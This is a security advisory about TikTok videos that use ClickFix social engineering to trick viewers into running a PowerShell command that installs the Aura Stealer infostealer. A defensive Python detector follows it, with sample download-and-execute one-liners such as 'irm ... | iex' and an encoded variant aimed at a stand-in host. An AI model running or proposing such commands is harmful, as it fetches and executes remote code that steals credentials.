414/68 Tuesday, October 21, 2025

Threat actors are using the popular short-video platform TikTok to distribute information-stealing malware by posting short clips that claim to teach viewers how to unlock or activate software and services for free – for example, Windows, Microsoft 365, Adobe Photoshop, Spotify Premium, and Netflix. The technique used in these attacks is called “ClickFix,” a form of social-engineering attack that tricks users into copying and running malicious scripts or commands themselves under the pretext of “fixing” or activating a program.
The attackers display a single short command line in the video and instruct viewers to paste and run it in PowerShell with administrator privileges. When executed, that command connects to a remote server to download and run a second-stage script, which installs the information stealer known as “Aura Stealer.” Aura Stealer is capable of harvesting a wide range of sensitive data stored on the victim’s machine, including browser passwords, authentication cookies, cryptocurrency wallet data, and other application credentials, then exfiltrating those items back to the attackers.
If you followed instructions from one of these videos, assume your account credentials may already be compromised and immediately change the passwords for any affected services. As a general safety rule, never copy and paste commands from untrusted websites, videos, or messages into Command Prompt, PowerShell, or Terminal. ClickFix-style attacks have grown significantly over the past year and are being used to distribute many types of malware, for purposes such as ransomware and theft of digital assets.
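For defenders hunting for the download-and-run command described above, the following added example (not part of the original advisory) flags PowerShell command lines that both fetch remote content and execute it in memory, including when the command is wrapped in -EncodedCommand. The sample command lines, the example.invalid host, and the function names are constructed for illustration.

```python
import base64
import re

# Tokens that fetch remote content (cmdlets, aliases, .NET WebClient calls).
FETCH = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget)\b"
    r"|net\.webclient|downloadstring|downloaddata", re.I)
# Tokens that run a downloaded string in memory instead of saving a file.
EXEC = re.compile(r"\b(iex|invoke-expression)\b|\[scriptblock\]::create", re.I)
# A parameter starting with -e (-e, -enc, -EncodedCommand) and a base64-looking value.
ENCODED = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand(cmdline):
    """Return the command line plus any decodable -EncodedCommand payloads."""
    texts = [cmdline]
    for blob in ENCODED.findall(cmdline):
        try:
            # PowerShell expects base64 over UTF-16LE text.
            texts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:  # bad base64 or bad UTF-16: keep only the raw text
            pass
    return texts


def findings(cmdline):
    """Set of reasons this command line resembles a ClickFix one-liner."""
    reasons = set()
    if ENCODED.search(cmdline):
        reasons.add("encoded-command")
    for text in expand(cmdline):
        if FETCH.search(text):
            reasons.add("remote-fetch")
        if EXEC.search(text):
            reasons.add("in-memory-exec")
    return reasons


def is_download_and_execute(cmdline):
    """True only when fetching and in-memory execution appear together."""
    return {"remote-fetch", "in-memory-exec"} <= findings(cmdline)


# Constructed sample command lines (not taken from the campaign).
_enc = base64.b64encode("iex (iwr https://example.invalid/a)".encode("utf-16-le")).decode()
SAMPLES = [
    'powershell.exe -NoProfile -Command "irm https://example.invalid/a | iex"',
    "powershell.exe -w hidden -enc " + _enc,
    'powershell.exe -Command "Invoke-WebRequest https://example.invalid/t.zip -OutFile t.zip"',
    'powershell.exe -Command "Get-ChildItem C:\\Users"',
]
```

The same checks can be run over process-creation command lines or PowerShell script block logging output; a plain download to disk (third sample) is reported as a fetch but not as download-and-execute.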